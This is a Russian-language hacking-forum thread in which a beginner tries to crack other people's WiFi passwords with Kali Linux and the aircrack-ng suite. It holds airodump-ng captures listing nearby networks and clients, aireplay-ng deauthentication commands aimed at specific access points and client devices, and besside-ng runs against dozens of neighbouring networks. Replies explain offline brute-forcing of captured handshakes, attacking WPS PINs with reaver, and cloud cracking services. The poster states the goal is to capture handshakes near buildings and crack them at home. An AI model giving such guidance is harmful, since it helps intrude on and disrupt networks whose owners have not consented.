Проблемы с перехватом хендшейка

Добрый вечер.
В первые пробую взломать пороль WiFi, установил ОС Kali Linux, работаю на ноутбуке от Lenovo G50-30.
Прочитал статью по ссылке (тоже на этом форуме), и много других.
Что я делал:
- подключил WiFi адаптер Alfa AWUS036H.
- переключил в режим мониторинга:

Code:

root@kali-Linux:~# airodump-ng mon0

 CH  3 ][ Elapsed: 4 s ][ 2015-05-11 19:29   
   
 BSSID  PWR  Beacons  #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID
   
 BC:F6:85:BF:C0:E6  -59  2  0  0  4  54e  WPA  CCMP  PSK  Kira-
 10:BF:48:E6:55:18  -70  4  0  0  6  54e  WPA2 CCMP  PSK  Roofl
 B0:B2:DC:DC:C5:59  -63  3  0  0  8  54e  WPA2 CCMP  PSK  Archi
 D4:21:22:53:CE:65  -76  6  0  0  8  54e  WPA2 CCMP  PSK  MGTS_
 B0:B2:DC:DC:C5:58  -67  11  0  0  8  54e  WPA2 CCMP  PSK  Archi
 60:A4:4C:DE:45:48  -74  2  0  0  4  54e  WPA2 CCMP  PSK  ASUS
 C0:C1:C0:48:76:8F  -74  2  0  0  2  54e. WPA2 CCMP  PSK  Alati
 60:A4:4C:A2:B7:F8  -65  2  0  0  13  54e  WPA2 CCMP  PSK  TAGNA
 00:14:D1:A5:4A:95  -67  2  0  0  11  54e. WPA2 CCMP  PSK  SPIDE
 D8:50:E6:D7:39:60  -67  12  3  0  6  54e  WPA2 CCMP  PSK  Anako
 00:22:15:71:2A:E5  -59  20  3  0  6  54  WPA  TKIP  PSK  WL520
 00:1C:F0:3B:C3:05  -66  18  4  1  6  54 . WPA  TKIP  PSK  dlink
 C4:6E:1F:D5:AE:8A  -71  2  0  0  6  54e. WPA2 CCMP  PSK  TP-LI
 90:E6:BA:F1:6C:30  -57  3  2  0  6  54  WPA2 CCMP  PSK  proje
 00:25:9C:F7:36:85  -53  21  0  0  9  54e. WPA2 CCMP  PSK  Port
 D4:21:22:99:45:61  -75  3  0  0  1  54e  WPA2 CCMP  PSK  MGTS_
 00:17:9A:84:FD:45  -71  3  0  0  3  54 . WPA2 CCMP  PSK  2b4A9
 C2:9F:DB:F7:43:B4  -69  0  3  0  1  -1  OPN  <leng

- затем перещел к перехвату хендшейка (проблема сразу выявилась): на форуме Античат и на других всегда при взломе были определены клиенты (station), а у меня это не происходило вообще вот что у меня показывало:

Code:

root@kali-Linux:~# airodump-ng mon0

 CH  5 ][ Elapsed: 1 min ][ 2015-05-11 20:49 ][ display sta only   
 
 BSSID  STATION  PWR  Rate  Lost  Frames  Probe   
   
 (not associated)  14:36:C6:AB:6C:94  -73  0 - 1  0  1   
 (not associated)  00:C0:CA:81:EC:0E  0  0 - 1  0  7   
 (not associated)  9C:AD:97:4D:37:19  0  0 - 1  0  39   
 (not associated)  18:00:2D:8A:FE:6D  -61  0 - 1  0  1   
 (not associated)  80:EA:96:C9:25:9B  -65  0 - 1  0  14   
 (not associated)  AC:7F:3E:6B:AA:7F  -67  0 - 1  0  1   
 (not associated)  30:10:B3:A2:C9:73  -69  0 - 1  0  9   
 (not associated)  6C:B7:F4:AE:BC:42  -69  0 - 1  0  3  YOTA   
 (not associated)  A8:BB:CF:A9:90:D4  -73  0 - 1  0  1   
 (not associated)  A8:BB:CF:C8:DB:F1  -73  0 - 1  0  1   
 (not associated)  00:21:63:80:CD:12  -73  0 - 1  0  1   
 (not associated)  80:56:F2:03:33:97  -71  0 - 1  38  4   
 (not associated)  B0:10:41:02:4E:57  -75  0 - 1  0  1  Rooflux   
 (not associated)  F0:24:75:D4:91:DB  -75  0 - 1  0  1   
 (not associated)  B0:10:41:DD:97:92  -79  0 - 1  0  6   
 (not associated)  44:6D:57:BE:2D:4B  -81  0 - 1  0  1  UPVEL UR-325BN   
 (not associated)  6C:3E:6D:65:9C:CA  -81  0 - 1  0  1   
 (not associated)  BC:92:6B:1C:06:D3  -69  0 - 1  0  2   
 (not associated)  BC:CF:CC:8E:95:44  -73  0 - 1  0  1   
 (not associated)  44:6D:57:3A:1E:B1  -69  0 - 1  0  1  asunto   
 (not associated)  C0:18:85:4D:22:53  -77  0 - 1  0  1   
 (not associated)  C0:64:C6:4F:25:48  -75  0 - 1  0  1   
 (not associated)  90:48:9A:35:39:5F  -73  0 - 1  0  3   
 (not associated)  54:EF:92:23:C7:30  -29  0 - 1  0  5 

как видно в коде к любому клиенту пишет not associated.
- С начало подумал, что для besside-ng все равно, но оказалось нет.
Вот что я увидел:

Code:

root@kali-Linux:~# besside-ng mon0
[20:04:44] Let's ride
[20:04:44] Resuming from besside.log
[20:04:44] Appending to wpa.cap
[20:04:44] Appending to wep.cap
[20:04:44] Logging to besside.log
[20:05:00] TO-OWN [nbn-78*, MGTS_GPON_9228*, Alatin_Home*, Kira-WiFi*, Sashko*, tax*, Rooflux_5*, UPVEL UR-325BN*, 2b4A9Z72*, dlink*, Ali-1*, ASUS*, Rooflux*, Anakonda38*, WL520GC_1q1J*, ASUS1*, internetanet*, Port Royal*, ahalaimahalai*, Archiv_guest*, Archiv*, ASUS*, MGTS_GPON_4889*, YOTA*, Mgts_75*, WirelessNet*, SPIDER MAN*, asunto*, homezone*, WirelessNet*, project*, TAGNANG*, mgts87*, INGERSOLL*, ZyXEL_KEENETIC_4G_FCD75C*, TP-LINK_D5AE8A*, mgts98*, MGTS_1232470*, Kanadci*] OWNED []
[20:05:03] Crappy connection - nbn-78 unreachable got 0/10 (100% loss) [-73 dbm]
[20:05:07] Crappy connection - MGTS_GPON_9228 unreachable got 0/10 (100% loss) [-65 dbm]
[20:05:08] Crappy connection - Alatin_Home unreachable got 1/10 (90% loss) [-69 dbm]
[20:05:42] Crappy connection - Rooflux_5 unreachable got 2/10 (80% loss) [-73 dbm]
[20:05:45] Crappy connection - UPVEL UR-325BN unreachable got 2/10 (80% loss) [-73 dbm]
[20:06:09] Crappy connection - Ali-1 unreachable got 1/10 (90% loss) [-75 dbm]
[20:07:02] Crappy connection - internetanet unreachable got 0/10 (100% loss) [-73 dbm]
[20:07:14] Crappy connection - ahalaimahalai unreachable got 0/10 (100% loss) [-69 dbm]
[20:08:39] Crappy connection - asunto unreachable got 0/10 (100% loss) [-75 dbm]
[20:08:51] Crappy connection - WirelessNet unreachable got 0/10 (100% loss) [-83 dbm]
[20:09:25] Crappy connection - INGERSOLL unreachable got 0/10 (100% loss) [-73 dbm]
[20:09:56] Crappy connection - MGTS_1232470 unreachable got 0/10 (100% loss) [-73 dbm]
[20:10:07] Crappy connection - 261fa8 unreachable got 0/10 (100% loss) [-75 dbm]
[20:10:19] Crappy connection - MKNet unreachable got 0/10 (100% loss) [-71 dbm]
[20:10:30] Crappy connection - Sakura unreachable got 0/10 (100% loss) [-79 dbm]
[20:10:53] Crappy connection - Slon unreachable got 0/10 (100% loss) [-75 dbm]
[20:10:56] Crappy connection - NETGEAR38 unreachable got 0/10 (100% loss) [-77 dbm]
[20:10:57] Crappy connection - Homenet unreachable got 0/10 (100% loss) [-75 dbm]
[20:11:01] Crappy connection - DIR-620 unreachable got 1/10 (90% loss) [-76 dbm]
[20:11:24] Crappy connection - Proton Wi-Fi unreachable got 0/10 (100% loss) [-73 dbm]
[20:11:27] Crappy connection -  unreachable got 0/10 (100% loss) [-75 dbm]
[20:11:28] Crappy connection - onlime-109 unreachable got 0/10 (100% loss) [-75 dbm]
[20:11:32] Crappy connection - 14 unreachable got 0/10 (100% loss) [-69 dbm]

С первого взгляда кажется, что все "ок", однако решил проверить качество пойманого хендшейка, перешел в папку wep.cap и wireshark пишет :

через aircrack-ng, но все равно ни чего не вышло:

Code:

root@kali-Linux:~# aircrack-ng /wep.cap
Opening /wep.cap
read(file header) failed: Success
Read 0 packets.

No networks found, exiting.

Quitting aircrack-ng...

- снова перешел к airodump-ng, попробовал:

Code:

root@kali-Linux:~# airodump-ng --bssid CC:5D:4E:DA:11:C8 -c1 -w hachthis mon0

 CH  1 ][ Elapsed: 59 mins ][ 2015-05-11 20:02 ][ fixed channel mon0: -1   
   
 BSSID  PWR RXQ  Beacons  #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID
   
 CC:5D:4E:DA:11:C8  -60  0  5500  417  0  1  54e  WPA2 CCMP  PSK  Sashko   
   
 BSSID  STATION  PWR  Rate  Lost  Frames  Probe

в этоже время пробовал откдючвть клиентов:

Code:

root@kali-Linux:~# aireplay-ng --deauth 5 -a CC:5D:4E:DA:11:C8 mon0
21:08:34  Waiting for beacon frame (BSSID: CC:5D:4E:DA:11:C8) on channel -1
21:08:34  Couldn't determine current channel for mon0, you should either force the operation with --ignore-negative-one or apply a kernel patch
Please specify an ESSID (-e).
root@kali-Linux:~# aireplay-ng --deauth 5 -a CC:5D:4E:DA:11:C8 -e Sashko mon0
21:08:41  Waiting for beacon frame (BSSID: CC:5D:4E:DA:11:C8) on channel -1
21:08:41  Couldn't determine current channel for mon0, you should either force the operation with --ignore-negative-one or apply a kernel patch

- снова ни чего не вышло, только других способов больше не знаю.
В чем ошибка ума не приложу, весь русские и английские форумы и статьи прочитал и облазил, полностю в ТУПИКЕ.
Заранее благодарен.

 

Не внимательно читаешь скорее всего раз не понимаешь для чего ты команды вводишь.
Может видео поможет..

 

на английском возможно, что много пропустил, так как не владею английским на 100%. Поэтому очень даже может быть.
А видео я почти не смотрел, спасибо

 

т.е. я правельно понимаю, что хендшейк нужен, чтобы взломать с помощью reaver, а если брутом то он вовсе не нужен?

 

Handshake как раз таки нужен для брута.Что бы проще тебе было понять - Handshake - это момент рукопожатия между точкой и клиентом(момент когда клиент передает пароль точке в шифрованном виде)А брут - это процес перебора(как бы угадать пароль из словаря в котором он может быть) пароля.Если у нас не будет handshake-a то нам не будет что брутит.Понимаешь?
А reaver - это другое кино... REAVER это утилита для перебора ПИНов когда роутер уязвим по протоколу WPS(WIireless Protected Setup).Здесь как раз таки handshake не нужен.В вардрайвинге есть такой приоритет взлома,что если есть WPS то сначала ломается он а аж потом брут если первый этап не даст результатов так как WPS ломается быстрее и проще.А прежде чем ломать WPS стоит проверить наличия ПИНа от роутера на наличие в списке стандартных пинов http://k0derz.ru/база-wps-pin-кодов/.
Проверить есть ли на роутере WPS можно утилитой wash в Kali Linux на пример так:

Code:

 wash -i mon0 

 

И опять же у этого парня (девушки) в видео сразу поймал клиентов, которые подключены к тому или иному wifi -ю. А у меня этого не происходит. Вот поэтому я сюда и обратился. Как это исправить?

 

нет не правельно

 

Вот сегодня вышел "прогуляться" и около офисного здания попробовал снова, что получится:

Code:

CH  4 ][ Elapsed: 44 s ][ 2015-05-12 07:13 ][ display sta only

BSSID  STATION  PWR  Rate  Lost  Frames  Probe

(not associated)  5C:93:A2:9E:E2:07  -67  0 - 1  0  1
(not associated)  9C:AD:97:4D:37:19  0  0 - 1  0  13
(not associated)  00:C0:CA:81:EC:0E  4  0 - 1  0  4
(not associated)  1C:7B:21:97:E5:A2  -57  0 - 1  0  5
(not associated)  C0:64:C6:4F:F2:B0  -63  0 - 1  134  15  HOME_5_GHz,ASUS_5G,33RUS
(not associated)  58:12:43:BB:AD:90  -65  0 - 1  0  2
(not associated)  AC:22:0B:21:62:BB  -63  0 - 5  3622  593  AVK119,ASUS,HP-Print-32-Deskjet 3520 series,default,Smart_box-CEB676_guest,onlime
(not associated)  34:08:04:32:FF:2A  -67  0 - 1  0  2
(not associated)  00:1F:3C:B1:EB:0E  -67  0 - 1  0  5
(not associated)  48:59:29:F6:D3:1E  -67  0 - 1  0  3
(not associated)  74:2F:68:83:F1:60  -69  0 - 1  32  9
(not associated)  90:A4:DE:5E:ED:47  -69  0 - 1  0  4
(not associated)  C4:42:02:E1:55:CD  -69  0 - 1  0  15  KafeBryans,�.�.ТС-684496,�.�.ТС-684496,�.�.ТС-684496,�.�.ТС-684496,�.�.Т
(not associated)  88:63:DF:2A:FE:0E  -69  0 - 1  0  1  slnkv
(not associated)  BC:F5:AC:9E:9A:D9  -69  0 - 1  0  1
(not associated)  00:26:C7:03:22:B8  -69  0 - 1  0  10
(not associated)  38:63:F6:06:30:52  -71  0 - 1  0  3
(not associated)  B0:65:BD:99:BD:AC  -71  0 - 1  0  4  mwmp,wmp
(not associated)  00:25:D3:6B:0B:CF  -71  0 - 1  0  1
(not associated)  F0:7B:CB:95:48:79  -71  0 - 1  0  1  dlink
(not associated)  68:17:29:F1:A7:B1  -71  0 - 1  35  4
(not associated)  C4:85:08:3C:AD:07  -71  0 - 1  76  2  Normanykt
(not associated)  DC:85:DE:8A:A5:31  -73  0 - 1  34  6
(not associated)  68:94:23:24:92:9A  -63  0 - 1  96  48  AP-SGP
(not associated)  9C:2A:70:1A:E2:89  -73  0 - 1  38  12  Artur
(not associated)  F0:F6:1C:2D:FE:87  -73  0 - 1  0  1
(not associated)  40:0E:85:3A:72:E3  -73  0 - 1  0  1  sshipulin_guest
(not associated)  1C:B0:94:C7:4D:8A  -73  0 - 1  0  5  TRENDnet651
(not associated)  50:B7:C3:DE:87:2D  -75  0 - 1  0  1
(not associated)  7C:E9:D3:B0:05:16  -75  0 - 1  91  16  AP-SGP


CH  1 ][ Elapsed: 48 s ][ 2015-05-12 07:13 ][ display sta only

BSSID  STATION  PWR  Rate  Lost  Frames  Probe

(not associated)  18:F4:6A:33:37:83  -67  0 - 1  0  1
(not associated)  00:C0:CA:81:EC:0E  4  0 - 1  0  4
(not associated)  9C:AD:97:4D:37:19  0  0 - 1  0  13
(not associated)  1C:7B:21:97:E5:A2  -57  0 - 1  0  5
(not associated)  C0:64:C6:4F:F2:B0  -63  0 - 1  0  15  HOME_5_GHz,
(not associated)  68:94:23:24:92:9A  -63  0 - 1  0  48  AP-SGP
(not associated)  00:E1:85:09:01:1C  -65  0 - 1  2  3
(not associated)  58:12:43:BB:AD:90  -65  0 - 1  0  2
(not associated)  AC:22:0B:21:62:BB  -65  0 - 5  1873  679  AVK119,ASUS
(not associated)  5C:93:A2:9E:E2:07  -67  0 - 1  0  1
(not associated)  34:08:04:32:FF:2A  -67  0 - 1  0  2
(not associated)  00:1F:3C:B1:EB:0E  -67  0 - 1  0  5
(not associated)  48:59:29:F6:D3:1E  -67  0 - 1  0  3
(not associated)  74:2F:68:83:F1:60  -69  0 - 1  0  9
(not associated)  90:A4:DE:5E:ED:47  -69  0 - 1  0  4
(not associated)  C4:42:02:E1:55:CD  -69  0 - 1  0  15  KafeBryans,
(not associated)  88:63:DF:2A:FE:0E  -69  0 - 1  0  1  slnkv
(not associated)  BC:F5:AC:9E:9A:D9  -69  0 - 1  0  1


CH 13 ][ Elapsed: 1 min ][ 2015-05-12 07:14 ][ display sta only

BSSID  STATION  PWR  Rate  Lost  Frames  Probe

(not associated)  9C:AD:97:4D:37:19  0  0 - 1  0  26
(not associated)  00:C0:CA:81:EC:0E  0  0 - 1  0  8
(not associated)  1C:7B:21:97:E5:A2  -57  0 - 1  0  5
(not associated)  00:E1:85:09:01:1C  -61  0 - 1  51  5
(not associated)  C0:64:C6:4F:F2:B0  -63  0 - 1  0  15  HOME_5_GHz,ASUS_5G,33RUS
(not associated)  1C:B0:94:C7:4D:8A  -63  0 - 1  0  8  TRENDnet651
(not associated)  AC:22:0B:21:62:BB  -67  0 - 5  1128  987  AVK119,ASUS,HP-Print-32-Deskjet 3520 series,default,Smart_box-CEB676_guest,onlime
(not associated)  58:12:43:BB:AD:90  -65  0 - 1  0  2
(not associated)  18:F4:6A:33:37:83  -67  0 - 1  0  1
(not associated)  5C:93:A2:9E:E2:07  -67  0 - 1  0  1
(not associated)  34:08:04:32:FF:2A  -67  0 - 1  0  2
(not associated)  00:1F:3C:B1:EB:0E  -67  0 - 1  0  5
(not associated)  48:59:29:F6:D3:1E  -67  0 - 1  0  3
(not associated)  68:94:23:24:92:9A  -67  0 - 1  30  61  AP-SGP
(not associated)  00:26:C7:03:22:B8  -67  0 - 1  30  14
(not associated)  9C:2A:70:1A:E2:89  -67  0 - 1  80  20  Artur
(not associated)  74:2F:68:83:F1:60  -67  0 - 1  16  16
(not associated)  B4:52:7E:92:A2:49  -69  0 - 1  0  1
(not associated)  90:A4:DE:5E:ED:47  -69  0 - 1  0  4
(not associated)  C4:42:02:E1:55:CD  -69  0 - 1  0  15  KafeBryans,�.�.ТС-684496,�.�.ТС-684496,�.�.ТС-684496,�.�.ТС-684496,�.�.Т
(not associated)  88:63:DF:2A:FE:0E  -69  0 - 1  0  1  slnkv
(not associated)  00:26:AB:61:C2:54  -69  0 - 1  42  33  Screen
(not associated)  B0:5C:E5:C2:0E:24  -71  0 - 1  0  1
(not associated)  00:08:CA:28:82:C1  -71  0 - 1  0  6
(not associated)  1C:4B:D6:DE:76:AA  -71  0 - 1  0  3
(not associated)  38:63:F6:06:30:52  -71  0 - 1  0  3
(not associated)  B0:65:BD:99:BD:AC  -71  0 - 1  0  4  mwmp,wmp
(not associated)  00:25:D3:6B:0B:CF  -71  0 - 1  0  1
(not associated)  F0:7B:CB:95:48:79  -71  0 - 1  0  1  dlink
(not associated)  68:17:29:F1:A7:B1  -71  0 - 1  0  4

снова тоже самое 1000-и клиентов и ни один человек не подключен к точки доступа. Как так?
Каким образом aireplay-ng будет отключать клиентов, если он их даже не видет, или besside-ng, получается без клиентов у меня нет шансов взломать пороль WiFi?

 

Спасибо, с этим я уже разобрался, вот с клиентами нет

 

что с ними не так ?

 

Одного клиента спустя 2 дня поиска наконец то обнаружил:

Code:

 CH 10 ][ Elapsed: 51 min ][ 2015-05-12 07:45   
   
 BSSID  PWR  Beacons  #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID
   
 2C:AB:25:0B:B5:1C  -1  0  0  0  -1  -1  <length:  0>   
 B0:B2:DC:88:29:54  -1  0  0  0  -1  -1  <length:  0>   
 00:11:24:98:61:E8  -1  0  0  0  -1  -1  <length:  0>   
 64:66:B3:53:F9:6C  -1  0  0  0  -1  -1  <length:  0>   
 1C:BD:B9:2B:E6:00  -28  3  0  0  6  54e. WPA2 CCMP  PSK  Indiweed   
-------- 20:CF:30:D6:46:DB  -64  34  0  0  12  54e  WPA2 CCMP  PSK  JackVorobey   
 EE:43:F6:03:F5:A8  -53  132  13  0  9  54e  WPA2 CCMP  PSK  <length:  0>   
 F4:6D:04:7D:88:07  -58  79  3  0  6  54  WPA2 TKIP  PSK  smirnoff   
 10:FE:ED:4A:3F:E2  -57  124  8  0  4  54e. WPA2 CCMP  PSK  Imgnp   
 00:18:E7:FC:95:80  -57  69  0  0  13  54 . WPA2 CCMP  PSK  gersan3   
 CC:5D:4E:FE:1C:E8  -59  83  0  0  11  54e  WPA2 CCMP  PSK  Gosp   
 EC:43:F6:DD:12:DC  -63  37  1  0  4  54e  WPA2 CCMP  PSK  Keenetic-7833   
 F4:6D:04:C3:B9:14  -60  72  0  0  6  54e  WPA2 CCMP  PSK  Vandam   
 54:A0:50:DD:40:DC  -60  24  2  0  1  54e  WPA2 CCMP  PSK  wifi513   
 10:BF:48:E6:42:AF  -61  47  1  0  6  54e  WPA2 CCMP  PSK  ASUS   
 F8:C0:91:25:A9:88  -61  46  0  0  13  54e  WPA2 CCMP  PSK  Upvel   
 D8:5D:4C:D6:14:92  -63  47  3  0  7  54e. WPA2 CCMP  PSK  FreeWiFi   
 78:24:AF:7E:A3:5C  -64  46  3  0  6  54e  WPA2 CCMP  PSK  ASUS   
 D8:50:E6:AF:48:40  -64  20  3  0  6  54e  WPA2 CCMP  PSK  Olimpiya   
 20:4E:7F:51:4A:FE  -62  75  0  0  3  54e. WPA2 CCMP  PSK  makap   
 14:DA:E9:79:B6:7C  -64  23  0  0  13  54e  OPN  MrBoshi   
 52:68:9D:EA:FD:F0  -65  32  0  0  1  54e. WPA2 CCMP  PSK  10-11b   
 1C:7E:E5:92:EA:6C  -65  6  0  0  1  54e  WPA2 CCMP  PSK  DIR-620 1   
 38:1C:1A:2E:93:E0  -65  25  0  0  6  54e. WPA2 CCMP  MGT  bmstu_student   
 64:70:02:CA:3D:E2  -65  13  0  0  11  54e. WPA2 CCMP  PSK  Service   
 14:DA:E9:F8:FA:A4  -65  4  0  0  13  54e  WPA2 CCMP  PSK  rb1   
 00:23:54:73:99:D2  -66  7  1  0  9  54  WPA2 CCMP  PSK  Asus   
 38:1C:1A:2E:93:E2  -67  21  0  0  6  54e. OPN  bmstu_staff   
 D4:BF:7F:01:78:B8  -67  17  0  0  9  54e  WPA2 CCMP  PSK  514KZ   
 D4:BF:7F:01:B4:48  -67  11  0  0  9  54e  WPA2 CCMP  PSK  PUSSY 



 CH 12 ][ Elapsed: 28 s ][ 2015-05-12 07:45 ][ display sta only   
   
 BSSID  STATION  PWR  Rate  Lost  Frames  Probe   
   
 (not associated)  00:C0:CA:81:EC:0E  0  0 - 1  0  4   
 (not associated)  9C:8E:99:08:14:34  -57  0 - 1  33  37  UI.RU-IU.RU
 (not associated)  88:70:8C:14:8A:B2  -55  0 - 1  5  4   
 (not associated)  A4:EE:57:6F:C7:A3  -55  0 - 1  42  14   
 (not associated)  6C:40:08:DC:81:7F  -57  0 - 1  22  2   
 (not associated)  00:81:6A:3B:4F:81  -63  0 - 1  0  3   
 (not associated)  24:FD:52:B5:2E:CC  -65  0 - 1  0  3   
 (not associated)  24:0A:64:B6:8C:EB  -65  0 - 1  0  7   
 (not associated)  DC:85:DE:25:8B:1A  -67  0 - 1  0  1  ASUS   
 (not associated)  24:0A:64:B1:72:9B  -69  0 - 1  0  1   
 (not associated)  74:F0:6D:75:72:74  -71  0 - 1  0  1   
 (not associated)  94:39:E5:53:A3:F7  -71  0 - 1  49  2   
 20:CF:30:D6:46:DB  9C:AD:97:4D:37:19  0  0 - 1  5  173 

Снова пробую перехватить:

Code:

CH 1 ] [ Elapsed: 33 mins ][ 2015-05-12 07:56   
   
 BSSID  PWR  Beacons  #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID
   
 20:CF:30:D6:46:DB  -65  323  0  0  12  54e  WPA2 CCMP  PSK  JackV
   
 BSSID  STATION  PWR  Rate  Lost  Frames  Probe   
 

одновременно пробую отключить клиента :

Code:

root@kali-Linux:~# aireplay-ng --deauth 5 -a 20:CF:30:D6:46:DB -c 9C:AD:97:4D:37:19 mon0
07:55:13  Waiting for beacon frame (BSSID: 20:CF:30:D6:46:DB) on channel -1
07:55:13  Couldn't determine current channel for mon0, you should either force the operation with --ignore-negative-one or apply a kernel patch
Please specify an ESSID (-e).

Снова не получается.

 

Не могу отключить их пишет:

Code:

root@kali-Linux:~# aireplay-ng --deauth 5 -a 20:CF:30:D6:46:DB -c 9C:AD:97:4D:37:19 mon0
07:55:13  Waiting for beacon frame (BSSID: 20:CF:30:D6:46:DB) on channel -1
07:55:13  Couldn't determine current channel for mon0, you should either force the operation with --ignore-negative-one or apply a kernel patch
Please specify an ESSID (-e).

если добовляю essid, то:

Code:

root@kali-Linux:~# aireplay-ng --deauth 5 -e JackVorobey -a 20:CF:30:D6:46:DB -c 9C:AD:97:4D:37:19 mon0
08:02:06  Waiting for beacon frame (BSSID: 20:CF:30:D6:46:DB) on channel -1
08:02:06  Couldn't determine current channel for mon0, you should either force the operation with --ignore-negative-one or apply a kernel patch

 

--ignore-negative-one для кого эта строчка?

 

Это и есть мой вопрос, почему он не хочет отключить клиента, а выдает какое-то "Г"?
--ignore-negative-one - сам не знаю что такое
вот что выдает help к команде aireplay-ng:

Code:

root@kali-Linux:~# aireplay-ng --help

  Aireplay-ng 1.2 rc1 - (C) 2006-2013 Thomas d'Otreppe
  http://www.aircrack-ng.org

  usage: aireplay-ng <options> <replay interface>

  Filter options:

  -b bssid  : MAC address, Access Point
  -d dmac  : MAC address, Destination
  -s smac  : MAC address, Source
  -m len  : minimum packet length
  -n len  : maximum packet length
  -u type  : frame control, type  field
  -v subt  : frame control, subtype field
  -t tods  : frame control, To  DS bit
  -f fromds : frame control, From  DS bit
  -w iswep  : frame control, WEP  bit
  -D  : disable AP detection

  Replay options:

  -x nbpps  : number of packets per second
  -p fctrl  : set frame control word (hex)
  -a bssid  : set Access Point MAC address
  -c dmac  : set Destination  MAC address
  -h smac  : set Source  MAC address
  -g value  : change ring buffer size (default: 8)
  -F  : choose first matching packet

  Fakeauth attack options:

  -e essid  : set target AP SSID
  -o npckts : number of packets per burst (0=auto, default: 1)
  -q sec  : seconds between keep-alives
  -Q  : send reassociation requests
  -y prga  : keystream for shared key auth
  -T n  : exit after retry fake auth request n time

  Arp Replay attack options:

  -j  : inject FromDS packets

  Fragmentation attack options:

  -k IP  : set destination IP in fragments
  -l IP  : set source IP in fragments

  Test attack options:

  -B  : activates the bitrate test

  Source options:

  -i iface  : capture packets from this interface
  -r file  : extract packets from this pcap file

  Miscellaneous options:

  -R  : disable /dev/rtc usage
  --ignore-negative-one : if the interface's channel can't be determined,
  ignore the mismatch, needed for unpatched cfg80211

  Attack modes (numbers can still be used):

  --deauth  count : deauthenticate 1 or all stations (-0)
  --fakeauth  delay : fake authentication with AP (-1)
  --interactive  : interactive frame selection (-2)
  --arpreplay  : standard ARP-request replay (-3)
  --chopchop  : decrypt/chopchop WEP packet (-4)
  --fragment  : generates valid keystream  (-5)
  --caffe-latte  : query a client for new IVs  (-6)
  --cfrag  : fragments against a client  (-7)
  --migmode  : attacks WPA migration mode  (-8)
  --test  : tests injection and quality (-9)

  --help  : Displays this usage screen

почти в самом конце

Как можно исправить?

 

под твоей темой специально для тебя скопировал статью

 

Я недавно в Античат, не знаю где это "под темой" можно ссылку или просто вставить(как сообщение)?

 

Если я перехватил отличный хендшейк, я могу например брутить его дома или мне обязательно быть в зоне действия роутера.
Спрашиваю, потому что Вы говорите брутить хендшейк, тогда зачем соединение с роутером, по идее можно его про брутить узнать пороль и просто приходить на то место и подключаться к нему, можно так?
Если так, то было б велеколепно я с планшетным ноутбуком по перехватываю хендшейки, а дома с "крутой" быстрой и мощной видеокартой про брутю все хендшейки, а с ноутбуком я 10 лет взламывать буду)

 

Где хочешь там и брути, можешь в инете брутить, есть спец сервисы

 

Это очень хорошая информация, только хендшейк перехватить не получается.
Вы говорили про статью, подскажите, где она.

 

http://forum.antichat.ru/threads/425082/